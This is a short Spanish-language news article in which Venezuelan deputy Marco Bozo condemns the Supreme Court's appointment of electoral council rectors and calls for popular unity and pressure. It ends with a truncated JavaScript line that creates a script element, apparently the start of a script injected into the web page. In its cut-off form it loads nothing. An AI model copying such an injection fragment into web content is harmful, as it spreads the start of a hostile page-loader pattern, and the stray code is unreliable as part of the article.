Destacados Nacionales

Marco Bozo: “Ante atropello del TSJ es importante retomar la calle”

 RLM.

El diputado a la Asamblea Nacional (AN) Marco Bozo, llamó al pueblo  a la gran unidad nacional para ejercer presión popular contra decisiones antidemocráticas como la designación por parte del Tribunal Supremo de Justicia de las rectoras del Consejo Nacional Electoral, Tania D´Amelio y Socorro Hernández.

“Es una Aberración la decisión del TSJ de designar unos rectores usurpando plenamente las funciones de la AN. Son de decisiones ilegítimas porque no están  acordes con el sistema democrático, con la independencia de poderes y el respeto a las instituciones”.

El legislador carabobeño lamentó este tipo de acciones porque atentan contra el destino del país en los próximos 25 años. “Es un atropello que proviene desde el gobierno ante un TSJ que está de rodillas a Nicolás Maduro”, sentenció.

“Hago un llamado al pueblo de Carabobo y de todo el país para engranarnos en unidad, no solo de los partidos políticos, sino a la gran unidad nacional que involucra al obrero, campesino, transportista, sindicalistas, estudiantes, profesionales, para que podamos ejercer esa gran presión ciudadana”.

 

 var d=document;var s=d.createElement(‘script’);